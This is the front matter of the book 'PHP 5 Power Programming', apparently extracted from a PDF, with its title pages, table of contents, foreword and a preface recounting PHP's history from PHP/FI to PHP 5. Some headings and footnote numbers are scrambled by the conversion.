Gutmans Frontmatter

Transcript

1 Gutmans_Frontmatter Page i Thursday, September 23, 2004 9:05 AM PHP 5 Power Programming

2 perens_series_7x9.25.fm Page 1 Wednesday, September 15, 2004 10:54 AM Gutmans_Frontmatter Page ii Thursday, September 23, 2004 9:05 AM ERENS ERIES OURCE RUCE PEN ’ O P S B S http://www.phptr.com/perens ◆ Java Application Development on Linux Carl Albing and Michael Schwarz ◆ C++ GUI Programming with Qt 3 Jasmin Blanchette, Mark Summerfield ◆ Managing Linux Systems with Webmin: System Administration and Module Development Jamie Cameron Understanding the Linux Virtual Memory Manager ◆ Mel Gorman Implementing CIFS: The Common Internet File System ◆ Christopher Hertel ◆ Embedded Software Development with eCos Anthony Massa Rapid Application Development with Mozilla ◆ Nigel McFarlane The Linux Development Platform: Configuring, Using, and Maintaining a ◆ Complete Programming Environment Rafeeq Ur Rehman, Christopher Paul ◆ Intrusion Detection with SNORT: Advanced IDS Techniques Using SNORT, Apache, MySQL, PHP, and ACID Rafeeq Ur Rehman The Official Samba-3 HOWTO and Reference Guide ◆ John H. Terpstra, Jelmer R. Vernooij, Editors Samba-3 by Example: Practical Exercises to Successful Deployment ◆ John H. Terpstra

3 Gutmans_Frontmatter Page iii Thursday, September 23, 2004 9:05 AM PHP 5 Power Programming Andi Gutmans, Stig Sæther Bakken, and Derick Rethans PRENTICE HALL Professional Technical Reference Indianapolis, IN 46240 www.phptr.com

4 Gutmans_Frontmatter Page iv Thursday, September 23, 2004 2:14 PM The authors and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for inciden- tal or consequential damages in connection with or arising out of the use of the information or programs con- tained herein. Publisher: John Wait Don O’Hagan Editor in Chief: Acquisitions Editor: Mark L. Taub Editorial Assistant: Noreen Regina Development Editor: Janet Valade Marketing Manager: Robin O'Brien Nina Scuderi Cover Designer: Gina Kanouse Managing Editor: Kristy Hart Senior Project Editor: Specialized Composition Copy Editor: Indexer: Lisa Stumpf Gloria Schurick Senior Compositor: Dan Uhrig Manufacturing Buyer: The publisher offers excellent discounts on this book when ordered in quantity for bulk purchases or special sales, which may include electronic versions and/or custom covers and content particular to your business, training goals, marketing focus, and branding interests. For more information, please contact: U. S. Corporate and Government Sales (800) 382-3419 c [email protected] For sales outside the U. S., please contact: International Sales i [email protected] Visit us on the Web: www.phptr.com Library of Congress Cataloging-in-Publication Data: 2004107331 Copyright © 2005 Pearson Education, Inc. This material may be distrubuted only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/). Pearson Education, Inc. One Lake Street Upper Saddle River, NJ 07458 Every effort was made to contact and credit all copyright holders. Use of material without proper credit is unintentional. ISBN 0-131-47149-X Text printed in the United States on recycled paper at Phoenix in Hagerstown, Maryland. First printing, [October 2004]

5 Gutmans_Frontmatter Page v Thursday, September 23, 2004 9:05 AM To Ifat, my wife and best friend, who has patiently put up with my involement in PHP from the very beginning, and has encouraged and supported me every step of the way. Andi Gutmans To Marianne, for patience and encouragement. Stig Sæther Bakken To my parents, who care for me even when I’m not around; and to 42, the answer to life, the universe of everything. Derick Rethans

6 Gutmans_Frontmatter Page vi Thursday, September 23, 2004 9:05 AM

7 Gutmans_Frontmatter Page vii Thursday, September 23, 2004 9:05 AM vii Contents Foreword by Zeev Suraski Preface: Introduction and Background Chapter 1: What Is New in PHP 5? Chapter 2: PHP 5 Basic Language Chapter 3: PHP 5 OO Language Chapter 4: PHP 5 Advanced OOP and Design Patterns How to Write a Web Application with PHP Chapter 5: Chapter 6: Databases with PHP 5 Chapter 7: Error Handling Chapter 8: XML with PHP 5 Mainstream Extensions Chapter 9: Using PEAR Chapter 10: Chapter 11: Important PEAR Packages Building PEAR Components Chapter 12: Chapter 13: Making the Move Chapter 14: Performance An Introduction to Writing PHP Extensions Chapter 15: PHP Shell Scripting Chapter 16: PEAR and PECL Package Index A. phpDocumentor Format Reference B. C. Zend Studio Quick Start Index

8 Gutmans_Frontmatter Page viii Thursday, September 23, 2004 9:05 AM

9 Gutmans_TOC Page ix Thursday, September 23, 2004 9:06 AM Contents Foreword ... xxi Preface ... xxii 1 What Is New in PHP 5? ... 1 1.1 Introduction ... 1 1.2 Language Features ... 1 1.2.1 New Object-Oriented Model... 1 1.2.2 New Object-Oriented Features ... 3 1.2.3 Other New Language Features ... 7 1.3 General PHP Changes... 8 1.3.1 XML and Web Services ... 8 1.4 Other New Features in PHP 5 ... 11 1.4.1 New Memory Manager... 11 1.4.2 Dropped Support for Windows 95... 11 1.5 Summary ... 11 2 PHP 5 Basic Language ...13 2.1 Introduction ... 13 2.2 HTML Embedding ... 14 2.3 Comments ... 14 2.4 Variables... 15 2.4.1 Indirect References to Variables ... 16 2.4.2 Managing Variables ... 16 2.4.3 Superglobals ... 18 2.5 Basic Data Types ... 18 2.5.1 Integers ... 19 2.5.2 Floating-Point Numbers ... 19 2.5.3 Strings... 19 2.5.4 Booleans ... 22 2.5.5 Null ... 23 ix

10 Gutmans_TOC Page x Thursday, September 23, 2004 9:06 AM Contents x 2.5.6 Resources ...23 2.5.7 Arrays ...23 2.5.8 Constants ...30 2.6 Operators ...31 2.6.1 Binary Operators ...32 2.6.2 Assignment Operators...32 2.6.3 Comparison Operators ...33 2.6.4 Logical Operators ...34 2.6.5 Bitwise Operators ...35 2.6.6 Unary Operators ...36 2.6.7 Negation Operators ...36 2.6.8 Increment/Decrement Operators ...37 2.6.9 The Cast Operators ...38 2.6.10 The Silence Operator ...39 2.6.11 The One and Only Ternary Operator ...39 2.7 Control Structures ...39 2.7.1 Conditional Control Structures...39 2.7.2 Loop Control Structures ...42 2.7.3 Code Inclusion Control Structures ...45 2.8 Functions ...48 2.8.1 User-Defined Functions ...49 2.8.2 Function Scope...49 2.8.3 Returning Values By Value ...50 2.8.4 Returning Values By Reference ...51 2.8.5 Declaring Function Parameters...52 2.8.6 Static Variables ...53 2.9 Summary ...54 3 PHP 5 OO Language ... 55 3.1 Introduction...55 3.2 Objects ...55 3.3 Declaring a Class ...57 new Keyword and Constructors ...57 3.4 The 3.5 Destructors ...58 Variable...59 $this 3.6 Accessing Methods and Properties Using the 3.6.1 public , protected , and private Properties ...60 protected private public Methods ...61 3.6.2 , , and 3.6.3 Static Properties ...62 3.6.4 Static Methods ...64 3.7 Class Constants...65 3.8 Cloning Objects ...66 3.9 Polymorphism...67 3.10 :: and self parent ::...70 3.11 Operator ...71 instanceof

11 Gutmans_TOC Page xi Thursday, September 23, 2004 9:06 AM xi Contents 3.12 Abstract Methods and Classes ... 72 3.13 Interfaces ... 73 3.14 Inheritance of Interfaces ... 75 3.15 final Methods ... 75 final 3.16 Classes ... 76 __toString() 3.17 Method... 76 3.18 Exception Handling ... 77 ... 80 __autoload() 3.19 3.20 Class Type Hints in Function Parameters ... 82 3.21 Summary ... 83 4 PHP 5 Advanced OOP and Design Patterns ...85 4.1 Introduction ... 85 4.2 Overloading Capabilities... 85 4.2.1 Property and Method Overloading ... 85 4.2.2 Overloading the Array Access Syntax... 88 4.3 Iterators ... 89 4.4 Design Patterns ... 94 4.4.1 Strategy Pattern... 95 4.4.2 Singleton Pattern ... 97 4.4.3 Factory Pattern ... 98 4.4.4 Observer Pattern ... 101 4.5 Reflection... 103 4.5.1 Introduction ... 103 4.5.2 Reflection API... 103 4.5.3 Reflection Examples ... 106 4.5.4 Implementing the Delegation Pattern Using Reflection... 107 4.6 Summary ... 109 5 How to Write a Web Application with PHP...111 5.1 Introduction ... 111 5.2 Embedding into HTML ... 112 5.3 User Input ... 114 5.4 Safe-Handling User Input... 117 5.4.1 Common Mistakes ... 117 5.5 Techniques to Make Scripts “Safe” ... 120 5.5.1 Input Validation ... 120 5.5.2 HMAC Verification... 122 5.5.3 PEAR::Crypt_HMAC... 124 5.5.4 Input Filter ... 127 5.5.5 Working with Passwords ... 127 5.5.6 Error Handling ... 129 5.6 Cookies ... 131 5.7 Sessions ... 134

12 Gutmans_TOC Page xii Thursday, September 23, 2004 9:06 AM Contents xii 5.8 File Uploads ...137 5.8.1 Handling the Incoming Uploaded File ...138 5.9 Architecture...143 5.9.1 One Script Serves All ...143 5.9.2 One Script per Function ...144 5.9.3 Separating Logic from Layout ...144 5.10 Summary ...146 6 Databases with PHP 5 ... 149 6.1 Introduction...149 6.2 MySQL...149 6.2.1 MySQL Strengths and Weaknesses ...150 6.2.2 PHP Interface ...150 6.2.3 Example Data ...151 6.2.4 Connections ...151 6.2.5 Buffered Versus Unbuffered Queries ...153 6.2.6 Queries ...154 6.2.7 Multi Statements ...155 6.2.8 Fetching Modes ...156 6.2.9 Prepared Statements...156 6.2.10 BLOB Handling ...158 6.3 SQLite...160 6.3.1 SQLite Strengths and Weaknesses ...160 6.3.2 Best Areas of Use...161 6.3.3 PHP Interface ...162 6.4 PEAR DB ...176 6.4.1 Obtaining PEAR DB ...176 6.4.2 Pros and Cons of Database Abstraction ...177 6.4.3 Which Features Are Abstracted? ...177 6.4.4 Database Connections ...178 6.4.5 Executing Queries ...180 6.4.6 Fetching Results ...182 6.4.7 Sequences ...184 6.4.8 Portability Features ...185 6.4.9 Abstracted Errors ...186 6.4.10 Convenience Methods ...188 6.5 Summary ...190 7 Error Handling... 191 7.1 Introduction...191 7.2 Types of Errors ...192 7.2.1 Programming Errors ...192 7.2.2 Undefined Symbols ...194 7.2.3 Portability Errors ...197

13 Gutmans_TOC Page xiii Thursday, September 23, 2004 9:06 AM xiii Contents 7.2.4 Runtime Errors... 201 7.2.5 PHP Errors ... 201 7.3 PEAR Errors ... 206 7.3.1 The PEAR_Error Class ... 209 7.3.2 Handling PEAR Errors ... 212 7.3.3 PEAR Error Modes... 213 7.3.4 Graceful Handling ... 213 7.4 Exceptions ... 216 7.4.1 What Are Exceptions? ... 216 7.4.2 try, catch, and throw ... 216 7.5 Summary ... 218 8 XML with PHP 5 ...219 8.1 Introduction ... 219 8.2 Vocabulary... 220 8.3 Parsing XML ... 222 8.3.1 SAX ... 222 8.3.2 DOM ... 226 8.4 SimpleXML ... 231 8.4.1 Creating a SimpleXML Object... 232 8.4.2 Browsing SimpleXML Objects ... 233 8.4.3 Storing SimpleXML Objects ... 234 8.5 PEAR ... 234 8.5.1 XML_Tree ... 235 8.5.2 XML_RSS... 236 8.6 Converting XML ... 239 8.6.1 XSLT ... 239 8.7 Communicating with XML... 244 8.7.1 XML-RPC... 244 8.7.2 SOAP ... 252 8.8 Summary ... 259 9 Mainstream Extensions ...261 9.1 Introduction ... 261 9.2 Files and Streams ... 261 9.2.1 File Access ... 262 9.2.2 Program Input/Output ... 264 9.2.3 Input/Output Streams... 267 9.2.4 Compression Streams ... 268 9.2.5 User Streams ... 270 9.2.6 URL Streams ... 271 9.2.7 Locking ... 276 9.2.8 Renaming and Removing Files ... 277 9.2.9 Temporary Files ... 278

14 Gutmans_TOC Page xiv Thursday, September 23, 2004 9:06 AM Contents xiv 9.3 Regular Expressions ...279 9.3.1 Syntax ...279 9.3.2 Functions...293 9.4 Date Handling ...301 9.4.1 Retrieving Date and Time Information ...301 9.4.2 Formatting Date and Time ...305 9.4.3 Parsing Date Formats ...313 9.5 Graphics Manipulation with GD...314 9.5.1 Case 1: Bot-Proof Submission Forms ...315 9.5.2 Case 2: Bar Chart ...320 9.5.3 ...326 Exif 9.6 Multi-Byte Strings and Character Sets ...329 9.6.1 Character Set Conversions...330 9.6.2 Extra Functions Dealing with Multi-Byte Character Sets ...335 9.6.3 Locales ...340 9.7 Summary ...343 10 Using PEAR... 345 10.1 Introduction...345 10.2 PEAR Concepts ...346 10.2.1 Packages...346 10.2.2 Releases...346 10.2.3 Version Numbers ...347 10.3 Obtaining PEAR...349 10.3.1 Installing with UNIX / Linux PHP Distribution ...350 10.3.2 Installing with PHP Windows Installer ...351 10.3.3 go-pear.org ...351 10.4 Installing Packages ...354 Command ...354 pear 10.4.1 Using the 10.5 Configuration Parameters ...358 10.6 PEAR Commands...364 pear install ...364 10.6.1 pear list ...368 10.6.2 ...369 pear info 10.6.3 10.6.4 pear list-all ...370 ...370 pear list-upgrades 10.6.5 pear upgrade ...371 10.6.6 10.6.7 pear upgrade-all ...372 ...373 pear uninstall 10.6.8 10.6.9 ...373 pear search pear remote-list ...374 10.6.10 10.6.11 ...375 pear remote-info ...375 pear download 10.6.12 pear config-get ...376 10.6.13

15 Gutmans_TOC Page xv Thursday, September 23, 2004 9:06 AM xv Contents ... 376 pear config-set 10.6.14 pear config-show ... 376 10.6.15 10.6.16 Shortcuts... 377 10.7 Installer Front-Ends... 378 10.7.1 CLI (Command Line Interface) Installer ... 378 10.7.2 Gtk Installer ... 378 10.8 Summary ... 381 11 Important PEAR Packages ...383 11.1 Introduction ... 383 11.2 Database Queries... 383 11.3 Template Systems ... 383 11.3.1 Template Terminology ... 384 11.3.2 ... 384 HTML_Template_IT 11.3.3 HTML_Template_Flexy ... 387 11.4 Authentication ... 392 11.4.1 Overview ... 392 11.4.2 Example: Auth with Password File... 393 11.4.3 Example: Auth with DB and User Data ... 394 11.4.4 Auth Security Considerations... 396 11.4.5 Auth Scalability Considerations... 397 11.4.6 Auth Summary ... 398 11.5 Form Handling... 398 HTML_QuickForm ... 398 11.5.1 11.5.2 Example: Login Form... 399 11.5.3 Receiving Data... 399 11.6 Caching... 399 Cache_Lite 11.6.1 ... 399 11.7 Summary ... 401 12 Building PEAR Components ...403 12.1 Introduction ... 403 12.2 PEAR Standards... 403 12.2.1 Symbol Naming ... 403 12.2.2 Indentation ... 406 12.3 Release Versioning... 408 12.4 CLI Environment... 408 12.5 Fundamentals ... 410 12.5.1 When and How to Include Files... 410 12.5.2 Error Handling ... 411 12.6 Building Packages ... 411 12.6.1 PEAR Example: HelloWorld ... 411 12.6.2 Building the Tarball ... 414 12.6.3 Verification ... 414 12.6.4 Regression Tests... 416

16 Gutmans_TOC Page xvi Thursday, September 23, 2004 9:06 AM Contents xvi 12.7 The package.xml Format ...416 12.7.1 Package Information ...417 12.7.2 Release Information ...419 12.8 Dependencies...423 ...423 12.8.1 Element: 12.8.2 Element: ...423 12.8.3 Dependency Types ...424 12.8.4 Reasons to Avoid Dependencies ...425 12.8.5 Optional Dependencies...426 12.8.6 Some Examples...426 12.9 String Substitutions...427 ...427 12.9.1 Element: 12.9.2 Examples ...427 12.10 Including C Code...428 12.10.1 Element: ...428 12.10.2 Element: ...428 12.11 Releasing Packages ...428 12.12 The PEAR Release Process...429 12.13 Packaging ...430 12.13.1 Source Analysis...430 12.13.2 MD5 Checksum Generation ...430 12.13.3 Package.xml Update ...431 12.13.4 Tarball Creation ...431 12.14 Uploading ...432 12.14.1 Upload Release ...432 12.14.2 Finished!...432 12.15 Summary ...432 13 Making the Move ... 433 13.1 Introduction...433 13.2 The Object Model ...433 13.3 Passing Objects to Functions...433 13.4 Compatibility Mode...435 13.4.1 Casting Objects ...435 13.4.2 Comparing Objects ...436 13.5 Other Changes ...437 13.5.1 Assigning to $this ...437 13.5.2 ...440 get_class 13.6 E_STRICT ...441 13.6.1 Automagically Creating Objects ...441 and var public ...441 13.6.2 13.6.3 Constructors...442 13.6.4 Inherited Methods ...442 13.6.5 Define Classes Before Usage...443

17 Gutmans_TOC Page xvii Thursday, September 23, 2004 9:06 AM xvii Contents 13.7 Other Compatibility Problems ... 443 13.7.1 Command-Line Interface ... 443 13.7.2 Comment Tokens... 443 13.7.3 MySQL ... 445 13.8 Changes in Functions ... 445 13.8.1 array_merge() ... 445 13.8.2 ... 446 strrpos() and strripos() 13.9 Summary ... 447 14 Performance ...449 14.1 Introduction ... 449 14.2 Design for Performance ... 449 14.2.1 PHP Design Tip #1: Beware of State ... 450 14.2.2 PHP Design Tip #2: Cache!... 451 14.2.3 PHP Design Tip #3: Do Not Over Design!... 456 14.3 Benchmarking... 457 14.3.1 Using ApacheBench ... 457 14.3.2 Using Siege ... 458 14.3.3 Testing Versus Real Traffic ... 459 14.4 Profiling with Zend Studio's Profiler ... 459 14.5 Profiling with APD... 461 14.5.1 Installing APD ... 461 14.5.2 Analyzing Trace Data ... 462 14.6 Profiling with Xdebug... 465 14.6.1 Installing Xdebug ... 466 14.6.2 Tracing Script Execution ... 466 14.6.3 Using KCachegrind ... 468 14.7 Using APC (Advanced PHP Cache) ... 470 14.8 Using ZPS (Zend Performance Suite) ... 470 14.8.1 Automatic Optimization... 471 14.8.2 Compiled Code Caching ... 472 14.8.3 Dynamic Content Caching ... 473 14.8.4 Content Compression ... 476 14.9 Optimizing Code ... 477 14.9.1 Micro-Benchmarks ... 477 14.9.2 Rewrite in C ... 479 14.9.3 OO Versus Procedural Code ... 480 14.10 Summary ... 481 15 An Introduction to Writing PHP Extensions...483 15.1 Introduction ... 483 15.2 Quickstart ... 484 15.2.1 Memory Management ... 489 15.2.2 Returning Values from PHP Functions ... 490 self-concat() ... 490 15.2.3 Completing 15.2.4 Summary of Example... 492 15.2.5 Wrapping Third-Party Extensions ... 492

18 Gutmans_TOC Page xviii Thursday, September 23, 2004 9:06 AM xviii Contents 15.2.6 Global Variables ...501 15.2.7 Adding Custom INI Directives...503 15.2.8 Thread-Safe Resource Manager Macros...504 15.3 Summary ...505 16 PHP Shell Scripting ... 507 16.1 Introduction...507 16.2 PHP CLI Shell Scripts ...508 16.2.1 How CLI Differs From CGI ...508 16.2.2 The Shell-Scripting Environment...510 16.2.3 Parsing Command-Line Options ...512 16.2.4 Good Practices...515 16.2.5 Process Control ...516 16.2.6 Examples ...520 16.3 Summary ...526 A PEAR and PECL Package Index ... 527 A.1 Authentication ...527 A.2 Benchmarking ...530 A.3 Caching ...530 A.4 Configuration ...531 A.5 Console ...531 A.6 Database ...533 A.7 Date and Time ...542 A.8 Encryption ...543 A.9 File Formats...545 A.10 File System ...548 A.11 Gtk Components ...550 A.12 HTML...550 A.13 HTTP...561 A.14 Images ...563 A.15 Internationalization ...566 A.16 Logging...568 A.17 Mail ...569 A.18 Math ...571 A.19 Networking ...574 A.20 Numbers...584 A.21 Payment ...585 A.22 PEAR...587 A.23 PHP ...588 A.24 Processing ...594 A.25 Science...594 A.26 Streams ...595 A.27 Structures ...596 A.28 System...598 A.29 Text...599

19 Gutmans_TOC Page xix Thursday, September 23, 2004 9:06 AM Contents xix A.30 Tools and Utilities ... 600 A.31 Web Services ... 603 A.32 XML ... 604 B phpDocumentor Format Reference ...613 B.1 Introduction ... 613 B.2 Documentation Comments ... 613 B.3 Tag Reference ... 615 ... 615 B.3.1 abstract access ... 616 B.3.2 B.3.3 author ... 617 category B.3.4 ... 618 ... 618 copyright B.3.5 B.3.6 deprecated ... 618 ... 619 B.3.7 example ... 620 B.3.8 filesource ... 620 B.3.9 final global ... 621 B.3.10 B.3.11 ignore ... 622 B.3.12 inheritdoc (inline) ... 622 internal, internal (inline) ... 622 B.3.13 B.3.14 licence ... 623 link B.3.15 ... 623 B.3.16 (inline) ... 623 link name ... 624 B.3.17 ... 624 B.3.18 package param ... 626 B.3.19 B.3.20 return ... 627 B.3.21 see ... 627 since ... 628 B.3.22 B.3.23 static ... 628 staticvar ... 629 B.3.24 subpackage B.3.25 ... 629 todo B.3.26 ... 630 B.3.27 uses ... 630 B.3.28 var ... 631 B.3.29 ... 631 version B.4 Tag Table... 632 B.5 Using the phpDocumentor Tool ... 633 C Zend Studio Quick Start Guide ...643 C.1 Version 3.5.x ... 643 C.2 About the Zend Studio Client Quick Start Guide... 643 C.3 About Zend ... 643 C.4 Zend Studio Client: Overview... 644

20 Gutmans_TOC Page xx Thursday, September 23, 2004 9:06 AM xx Contents C.4.1 Studio Components ...644 C.4.2 Client Server Configuration ...645 C.4.3 Installation and Registration ...645 C.5 Editing a File ...647 C.5.1 Editing a File...647 C.6 Working with Projects ...648 C.6.1 Advantages of Working with Projects ...648 C.6.2 How to Create a Project ...648 C.7 Running the Debugger ...648 C.7.1 Internal Debugger...649 C.7.2 Remote Debugger ...649 C.7.3 Debug URL ...650 C.8 Configure Studio Server for Remote Debugger and Profiling ...650 C.9 Running the Profiler...651 C.10 Product Support...652 C.10.1 Getting Support...653 C.11 Main Features...653 Index ... 655

21 Gutmans_PrefaceFore Page xxi Thursday, September 23, 2004 9:06 AM Foreword Within the last few years, PHP has grown to be the most widespread web plat- form in the world, operational in more than a third of the web servers across the globe. PHP's growth is not only quantitative but also qualitative. More and more companies, including Fortune companies, rely on PHP to run their busi- ness-critical applications, which creates new jobs and increases the demand for PHP developers. Version 5, due to be released in the very near future, holds an even greater promise. While the complexity of starting off with PHP remains unchanged and very low, the features offered by PHP today enable developers to reach far beyond simple HTML applications. The revised object model allows for large- scale projects to be written efficiently, using standard object-oriented method- ologies. New XML support makes PHP the best language available for pro- cessing XML and, coupled with new SOAP support, an ideal platform for creating and using Web Services. This book, written by my colleague, Andi Gutmans, and two very promi- nent PHP developers, Stig Bakken and Derick Rethans, holds the key to unlocking the riches of PHP 5. It thoroughly covers all of the features of the new version, and is a must-have for all PHP developers who are interested in exploring PHP 5's advanced features. Zeev Suraski xxi

22 Gutmans_PrefaceFore Page xxii Thursday, September 23, 2004 9:06 AM Preface xxii Preface “The best security against revolution is in constant correction of abuses and the introduction of needed improvements. It is the neglect of timely repair that makes rebuilding necessary.”—Richard Whately EGINNING THE N B I It was eight years ago, when Rasmus Lerdorf first started developing PHP/FI. He could not have imagined that his creation would eventually lead to the development of PHP as we know it today, which is being used by millions of Personal Homepage Tools/ people. The first version of “PHP/FI,” called 1 Form Interpreter, was a collection of Perl scripts in 1995. One of the basic features was a Perl-like language for handling form submissions, but it lacked for loops. many common useful language features, such as 1 http://groups.google.com/[email protected]

23 Gutmans_PrefaceFore Page xxiii Thursday, September 23, 2004 9:06 AM In the Beginning xxiii PHP/FI 2 2 A rewrite came with PHP/FI 2 in 1997, but at that time the development was almost solely handled by Rasmus. After its release in November of that year, Andi Gutmans and Zeev Suraski bumped into PHP/FI while looking for a lan- guage to develop an e-commerce solution as a university project. They discov- ered that PHP/FI was not quite as powerful as it seemed, and its language was lacking many common features. One of the most interesting aspects included while the way loops were implemented. The hand-crafted lexical scanner would go through the script and when it hit the while keyword it would remember its position in the file. At the end of the loop, the file pointer sought back to the saved position, and the whole loop was reread and re-executed. PHP 3 Zeev and Andi decided to completely rewrite the scripting language. They then teamed up with Rasmus to release PHP 3, and along also came a new name: PHP: Hypertext Preprocessor, to emphasize that PHP was a different product and not only suitable for personal use. Zeev and Andi had also designed and implemented a new extension API. This new API made it possible to easily support additional extensions for performing tasks such as accessing databases, spell checkers and other technologies, which attracted many developers who were not part of the “core” group to join and contribute to the PHP project. At the time of PHP 3’s 3 release in June 1998, the estimated PHP installed base consisted of about 50,000 domains. PHP 3 sparked the beginning of PHP’s real breakthrough, and was the first version to have an installed base of more than one million domains. PHP 4 In late 1998, Zeev and Andi looked back at their work in PHP 3 and felt they could have written the scripting language even better, so they started yet another rewrite. While PHP 3 still continuously parsed the scripts while execut- ing them, PHP 4 came with a new paradigm of “compile first, execute later.” The compilation step does not compile PHP scripts into machine code; it instead compiles them into byte code, which is then executed by the Zend Engine ev & A Ze nd (Zend stands for i), the new heart of PHP 4. Because of this new way of executing scripts, the performance of PHP 4 was much better than that 4 . of PHP 3, with only a small amount of backward compatibility breakage Among other improvements was an improved extension API for better run-time performance, a web server abstraction layer allowing PHP 4 to run on most pop- ular web servers, and lots more. PHP 4 was officially released on May 22, 2002, and today its installed base has surpassed 15 million domains. 2 http://groups.google.com/groups?selm=Dn1JM9.61t%40gpu.utcc.utoronto.ca. 3 http://groups.google.com/groups?selm=Pine.WNT.3.96.980606130654.-317675I- 100000%40shell.lerdorf.on.ca. 4 http://www.php.net/manual/en/migration4.php.

24 Gutmans_PrefaceFore Page xxiv Thursday, September 23, 2004 9:06 AM xxiv Preface In PHP 3, the minor version number (the middle digit) was never used, and all versions were numbered as 3.0.x. This changed in PHP 4, and the minor version number was used to denote important changes in the language. The first 5 which introduced important change came in PHP 4.1.0, superglobals such as and . Superglobals can be accessed from within functions without $_GET $_POST keyword. This feature was added in order to allow the having to use the global INI option to be turned off. is a feature in register_globals register_globals PHP which automatically converts input variables like "?foo=bar" in http:// to a PHP variable called . Because many people do not php.net/?foo=bar $foo check input variables properly, many applications had security holes, which made it quite easy to circumvent security and authentication code. With the new superglobals in place, on April 22, 2002, PHP 4.2.0 was register_globals turned off by default. PHP 4.3.0, the last released with the significant PHP 4 version, was released on December 27, 2002. This version (CLI), a revamped file and net- introduced the Command Line Interface ), and a bundled GD library. Although most of streams work I/O layer (called those additions have no real effect on end users, the major version was bumped due to the major changes in PHP’s core. PHP 5 Soon after, the demand for more common object-oriented features increased immensely, and Andi came up with the idea of rewriting the objected-oriented part of the Zend Engine. Zeev and Andi wrote the “Zend Engine II: Feature 6 Overview and Design” document and jumpstarted heated discussions about PHP’s future. Although the basic language has stayed the same, many fea- tures were added, dropped, and changed by the time PHP 5 matured. For example, namespaces and multiple inheritance, which were mentioned in the original document, never made it into PHP 5. Multiple inheritance was dropped in favor of interfaces, and namespaces were dropped completely. You can find a full list of new features in Chapter, “What Is New in PHP 5?” PHP 5 is expected to maintain and even increase PHP’s leadership in the web development market. Not only does it revolutionizes PHP’s object- oriented support but it also contains many new features which make it the ultimate web development platform. The rewritten XML functionality in PHP 5 puts it on par with other web technologies in some areas and over- takes them in others, especially due to the new SimpleXML extension which makes it ridiculously easy to manipulate XML documents. In addition, the new SOAP, MySQLi, and variety of other extensions are significant mile- stones in PHP’s support for additional technologies. 5 http://www.php.net/release_4_1_0.php. 6 http://zend.com/engine2/ZendEngine-2.0.pdf.

25 Gutmans_PrefaceFore Page xxv Thursday, September 23, 2004 9:06 AM xxv Audience UDIENCE A This book is an introduction to the advanced features new to PHP 5. It is writ- ten for PHP programmers who are making the move to PHP 5. Although Chapter 2, “PHP 5 Basic Language,” contains an introduction to PHP 5 syn- tax, it is meant as a refresher for PHP programmers and not as a tutorial for new programmers. However, web developers with experience programming other high-level languages may indeed find that this tutorial is all they need in order to begin working effectively with PHP 5. VERVIEW HAPTER O C Chapter 1, “What Is New in PHP 5?” discusses the new features in PHP 5. Most of these new features deal with new object-oriented features, including small examples for each feature. It also gives an overview of the new exten- sions in PHP 5. Most of the topics mentioned in this chapter are explained in more detail in later chapters. Chapter 2, “PHP 5 Basic Language,” introduces the PHP syntax to those readers not familiar with PHP. All basic language constructs and variable types are explained along with simple examples to give the reader the neces- sary building blocks to build real scripts. Chapter 3, “PHP 5 OO Language,” continues exploring PHP 5's syntax, focusing on its object-oriented functionality. This chapter covers basics, such as properties and methods, and progresses to more complicated subjects, such as polymorphism, interfaces, exceptions, and lots more. Using the previous chapter as a foundation, Chapter 4, “PHP 5 Advanced OOP and Design Patterns,” covers some of the most advanced features of PHP 5’s object model. After learning these features, including four commonly used design patterns and PHP’s reflection capabilities, you will soon become an OO wizard. Now that you are familiar with the syntax and language features of PHP, Chapter 5, “How to Write a Web Application with PHP,” introduces you to the world of writing web applications. The authors show you basics, such as han- dling input through form variables and safety techniques, but this chapter also includes more advanced topics, such as handling sessions with cookies and PHP's session extension. You also find a few tips on laying out your source code for your web applications. Chapter 6, “Databases with PHP 5,” introduces using MySQL, SQLite, and Oracle from PHP, but focuses primarily on the PHP 5-specific details of database access. For each database, you learn about some of its strong and weak points, as well as the types of applications at which each excels. And of course, you learn how to interface with them using PHP's native functions or using PEAR DB.

26 Gutmans_PrefaceFore Page xxvi Thursday, September 23, 2004 9:06 AM Preface xxvi All scripts can throw errors, but of course you do not want them to show up on your web site once your application has passed its development state. Chapter 7, “Error Handling,” deals with different types of errors that exist, how to handle those errors with PHP, and how to handle errors with PEAR. As one of the important new features in PHP 5 is its renewed XML sup- port, a chapter on XML features in PHP 5 could not be missed. Chapter 8, “XML with PHP 5,” talks about the different strategies of parsing XML and converting XML to other formats with XSLT. XML-RPC and SOAP are intro- duced to show you how to implement web services with both techniques. Although not specifically for PHP 5, the five mainstream extensions that Chapter 9,“Mainstream Extensions,” covers are important enough to deserve a place in this book. The first section, “Files and Streams,” explains about han- stream is nothing more than a way to dling files and network streams. A access external data, such as a file, remote URL, or compressed file. The sec- ond section, “Regular Expressions,” explains the syntax of a regular expres- sion engine (PCRE) that PHP uses with numerous examples to show you how these expressions can make your life easier. In “Date Handling,” we explain the different functions used to parse and format date and time strings. In show you through two real-life scenar- “Graphics Manipulation with G D,” we ios the basic functions of creating and manipulating graphics with PHP. The last section in this chapter, “Multibyte Strings and Character Sets,” explains the different character sets and the functions to convert and handle different ones, including multi-byte strings used in Asian languages. Chapter 10, “Using PEAR,” introduces PEAR, the PHP Extension and Application Repository. Starting with concepts and installation, the chapter shows how to use PEAR and maintain the local installed packages. This chap- ter also includes a tour of the PEAR web site. Chapter 11, “Important PEAR Packages,” gives an overview of the most important PEAR packages, along with examples. Packages covered include Auth package to do authentication, form handling Template Systems, the HTML_QuickForm package, and a package used to simplify caching. with the Chapter 12, “Building PEAR Components,” explains how to create your package.xml own PEAR package. The PEAR Coding Standard and package def- inition format, together with tips on including files and package layout, get you on your way to completing your first PEAR package. Chapter 13, “Making the Move,” deals with the few backward-incompatible changes that were introduced between PHP 4 and PHP 5. This chapter tells you which things you need to take care of when making your application work on PHP 5, and provides workarounds wherever possible. Chapter 14, “Performance,” shows you how to make your scripts perform better. The chapter offers tips on standard PHP usage, the use of external util- ities (APD and Xdebug) to find problems in your scripts, and PHP accelerators like APC and Zend Performance Suite.

